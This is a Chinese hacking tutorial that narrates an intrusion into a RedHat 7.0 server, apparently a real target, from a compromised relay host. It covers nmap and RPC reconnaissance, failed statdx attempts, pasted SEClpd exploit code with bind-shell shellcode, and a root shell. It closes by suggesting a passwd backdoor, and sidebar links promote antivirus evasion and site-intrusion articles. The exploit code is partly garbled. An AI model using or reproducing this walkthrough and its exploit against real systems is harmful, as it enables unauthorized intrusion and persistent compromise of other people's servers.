如何入侵redhat linux？入侵redhat linux的步骤

2018-01-13 20:02:38责编：llp 来源：驱动管家人气：

我写此文的目的不在于教人入侵，而是为了提高自身的技术和加强网络管理员的安全防范意识。仅此而已!粗心大意的网络管理员应该明白：由于你们一个小小的操作失误可能会导致整个网络全面沦陷！本文主要是围绕UNIX下面的一个小小的服务进程(LPD:网络打印服务)的攻击而进行的。

让俺慢慢道来…..

咳…咳…先给我上茶！（什么?! 没有?俺不说了!!）呵呵……开开玩笑,言归正传.首先确定目标,随便找上台湾一个搜索引擎。随便挑一个吧！假设是：www.fbi.gov.tw。^__^

先让俺看看是不是连得上：

C:\ping www.fbi.gov.tw

Pinging www.fbi.gov.tw[202.106.184.200] with 32 bytes of data:

Reply from 202.106.184.200: bytes=32 time=541ms TTL=244

Reply from 202.106.184.200: bytes=32 time=620ms TTL=244

Reply from 202.106.184.200: bytes=32 time=651ms TTL=244

Reply from 202.106.184.200: bytes=32 time=511ms TTL=244

Ping statistics for 202.106.184.200:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 511ms, Maximum = 651ms, Average = 580ms

嘻嘻—不但连得上，速度还不错……

先telnet看看banner：

C:\>telnet www.fbi.gov.tw

遗失对主机的连接。

哈哈……看来把telnet服务给shut掉了！再试试ftp

C:\>ftp www.fbi.gov.tw

Connected to www.fbi.gov.tw.

220 fbi-www FTP server (Version wu-2.6.1(1) Wed Aug 9 05:54:50 EDT 2000) ready.

User (www.fbi.gov.tw:(none)):

呵~~wu-2.6.1看来有点眉目了。这台机器像是大名鼎鼎的…………对!RedHat7.0！没错就是她了！首先必须确认一下，连上俺的跳板:

C:\>telnet xxx.xxx.xxx.xxx

Red Hat Linux release 7.0 (Guinness)

Kernel 2.2.16-22smp on an i686

Password:

bash-2.04$

呵呵~~这是我在台湾的一台跳板。RH7的哦！等下我就会告诉你们拿这些肉鸡办法……拿上nmap扫描器，看看其中的奥妙~~~

bash-2.04$nmap -sT -O www.fbi.gov.tw

Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )

WARNING! The following files exist and are readable: /usr/local/sha

-services and ./nmap-services. I am choosing /usr/local/share/nmap/

s for security reasons. set NMAPDIR=. to give priority to files in

irectory

Interesting ports on (www.fbi.gov.tw):

(The 1520 ports scanned but not shown below are in state: closed)

Port State Service

25/tcp open smtp

79/tcp open finger

80/tcp open http

111/tcp open sunrpc

113/tcp open auth

443/tcp open https

513/tcp open login

514/tcp open shell

515/tcp open printer

587/tcp open submission

1024/tcp open kdm

TCP Sequence Prediction: Class=random positive increments

Difficulty=3247917 (Good luck!)

Remote operating system guess: Linux 2.1.122 - 2.2.16

Nmap run completed -- 1 IP address (1 host up) scanned in 9 seconds

恰恰！！打开的端口还挺多的嘛！不错……不错……。79/tcp finger？呵呵~先看看这个，不过linux没有finger用户列表这个漏洞，不管它俺先看看有没有倒霉鬼。

bash-2.04$finger @www.fbi.gov.tw

[www.fbi.gov.tw]

No one logged on.

sh*t！怎么会没人！开门！给我开门！:(……再看看111/tcp sunrpc。嘿嘿……近来rpc漏洞风行，不知道RH7这个东东会不会有？管它呢，先看看再说！

bash-2.04$rpcinfo -p www.fbi.gov.tw

program vers proto port service

100000 2 tcp 111 rpcbind

100000 2 udp 111 rpcbind

100021 1 udp 1024 nlockmgr

100021 3 udp 1024 nlockmgr

100024 1 udp 1025 status

100024 1 tcp 1024 status

看来有rpc.statd服务。等俺来看看能不能远程溢出拿个rootshell。哈哈！这个rpc.statd远程溢出是我在hack.co.za找到的。等俺先来看看帮助。嘻嘻~~

bash-2.04$./statdx -h

statdx by ron1n

Usage: stat [-t] [-p port] [-a addr] [-l len]

[-o offset] [-w num] [-s secs] [-d type]

-t attack a tcp dispatcher [udp]

-p rpc.statd serves requests on [query]

-a the stack address of the buffer is

-l the length of the buffer is [1024]

-o the offset to return to is [600]

-w the number of dwords to wipe is [9]

-s set timeout in seconds to [5]

-d use a hardcoded

Available types:

0 Redhat 6.2 (nfs-utils-0.1.6-2)

1 Redhat 6.1 (knfsd-1.4.7-7)

2 Redhat 6.0 (knfsd-1.2.2-4)

看来并不支持RH7。怎么办？？让俺把0-2全部试试看再说！start……

bash-2.04$stat -d 0 www.fbi.gov.tw

buffer: 0xbffff314 length: 999 ( str/ nul)

target: 0xbffff718 new: 0xbffff56c (offset: 600)

wiping 9 dwords

Failed - statd returned res_stat: (failure) state: 21

哈哈受到挫折，再试……

bash-2.04$stat -d 1 www.fbi.gov.tw

buffer: 0xbffff314 length: 999 ( str/ nul)

target: 0xbffff718 new: 0xbffff56c (offset: 600)

wiping 9 dwords

Failed - statd returned res_stat: (failure) state: 21

一样！继续……

bash-2.04$stat -d 1 www.fbi.gov.tw

buffer: 0xbffff314 length: 999 ( str/ nul)

target: 0xbffff718 new: 0xbffff56c (offset: 600)

wiping 9 dwords

Failed - statd returned res_stat: (failure) state: 21

我烤！！烤烤烤！rpc.statd行不通啊！让我想想看……RH7应该有个远程溢出……好像是lp服务造成的。让俺去找找看。哈哈~~找到了……“seclpd.c”应该是这个东东了。以下程序也可以在黑盟下载。

—————以下代码仅供教学使用，决不能用来进行恶意攻击—————

* Welcome to http://hlc.cnroot.com/

* Run: ./SEClpd victim brute -t type

* Try first ./SEClpd victim -t 0 then try the brute.

#include

#define ADDRESS_BUFFER_SIZE 32 4

#define APPEND_BUFFER_SIZE 52

#define FORMAT_LENGTH 512-8

#define NOPCOUNT 200

#define SHELLCODE_COUNT 1030

#define DELAY 50000

#define OFFSET_LIMIT 5000

char shellcode[] =

"\x31\xdb\x31\xc9\x31\xc0\xb0\x46\xcd\x80"

"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"

"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"

"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"

"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"

"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"

"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"

"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"

"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

哈哈~~brute暴力破解。看你出不出shell！现在要等上一会儿……去泡杯coffee慢慢来。（什么！没coffee？tea！这个也行！）…………过了大约一杯coffee的时间。也就是5-8分钟左右，就会有结果了。（什么！什么！5-8分钟你喝了5杯！我倒~~~）……出来了。哈哈~~

- [ ] shell located on www.fbi.gov.tw

- [ ] Enter Commands at will

Linux FBI.WWW 2.2.16-22smp #1 SMP Tue Aug 22 16:39:21 EDT 2000 i686 unknown

uid=0(root) gid=7(lp)

Well……哈哈~uid=0(root)哇哈哈哈哈…………先在你是root啦！可以为所欲为了~~把它的东西全部删了~~哈哈……太过火了~~还是在passwd中加个后门算了~~至于怎么加，这就不在本文的范围内了……^___^

路由器的功能是什么？家用路由器有哪些功能？
通信部门允许每个宽带用户使用两台电脑共享上网，这用户自己需要加装一个宽带路由器。那么，应该购买什么样的路由器才比较合适呢？现在的宽带路由器不少功能对于一般家庭用户来说确实非常实用，可以提高很多网络
详情2018-01-07 12:43:34责编：llp 来源：驱动管家
2016年木马病毒查杀软件的排行榜
现在的电脑杀毒软件种类很多，在选择的时候，很多人并不知道如何去进行选，按照什么标准来进行选择，其实在选择杀毒软件首先要看杀毒能力，其次可以根据杀毒软件的功能来进行判定排名，下面就和大家一起来分析一
详情2018-01-05 13:58:41责编：llp 来源：驱动管家
公共wifi密码安全吗？公共wifi密码共享有哪些坏处？
因为接触这个行业，所以在密码方面有深深的恐惧。商场里提供免费wifi，然后也提供支付宝微信支付，竟然有这么多人真的敢用着公用wifi付款买单，市场上共享wifi密码的软件层出不穷，我相信你肯定也用过，可你真的
详情2018-01-05 09:18:07责编：llp 来源：驱动管家
html如何加密解密？html加密解密有哪些方法？
二：转义字符 " "的妙用三：使用Microsoft出品的脚本编码器Script Encoder来进行编码（自创简单解码）四：任意添加NUL空字符（十六进制00H）（自创）五：无用内容混乱以及换行空格TAB大法六：自写解密
详情2018-01-03 10:53:47责编：llp 来源：驱动管家
游戏交易网怎么被入侵？游戏交易网的入侵方法
在这次入侵之前我已经拿到过一次这个网站的shell了,但是被删除了,由于不甘心又拿了一次,才有了下面的过程一: 踩点收集信息因为这个已经是第二次入侵,所以具体的信息我已经基本上掌握服务器上13个站点,大多数站
详情2018-01-04 14:30:43责编：llp 来源：驱动管家
qq游戏大厅怎么多开？qq游戏大厅多开的方法
qq游戏大厅怎么多开？qq游戏大厅多开的方法 1 一台电脑只能登陆一个QQ游戏，就算能进去，但是相同IP不你能在同一个房间。我的这个方法可以在一台电脑上登陆N个QQ游戏，而且可以在同一个房间刷欢乐豆。先找一个代
详情2018-01-04 09:07:50责编：llp 来源：驱动管家
木马免杀有哪些绝招？木马免杀的五大绝招
常用的木马免杀方法绝招一：快速搞定瑞星文件查杀操作步骤：　第一步：用OD载入，来到程序的入口点。　第二步：把入口点的第一句PUSH　EBP　改成POP　EBP　然后保存就可以躲过瑞　星的表面查杀。绝招二：快速定位
详情2018-01-07 09:11:57责编：llp 来源：驱动管家
openssl漏洞有哪些？openssl漏洞导致信息泄露
小编带来了openssl漏洞详情，想知道openssl重大安全漏洞具体是什么情况吗?会不会威胁到我们的财产安全呢?下文将会为大家详细介绍，网友们可以来了解一下。昨日，OpenSSL(为网络通信提供安全及数据完整性的一种安
详情2018-01-08 13:56:46责编：llp 来源：驱动管家
什么是ipc？什么是空会话？
ipc$一摘要网上关于 ipc$入侵的文章可谓多如牛毛，攻击步骤甚至已经成为了固化的模式，因此也没人愿意再把这已经成为定式的东西拿出来摆弄。不过话虽这样说，我认为这些文章讲解的并不详细，一些内容甚至是错
详情2018-01-05 09:04:38责编：llp 来源：驱动管家
黑客基地的渗透方法（冰兰黑客基地实例）
注：本人已经提交到C R S T ,适合新人学习首先是有个朋友对我说有个冰兰黑客基地，转载别人的文章还不著名作者，之后还蒙骗别人说他们能入侵国外站点所以就想检测一下首先看了以下他的站点，主站和论坛分
详情2018-01-04 17:49:34责编：llp 来源：驱动管家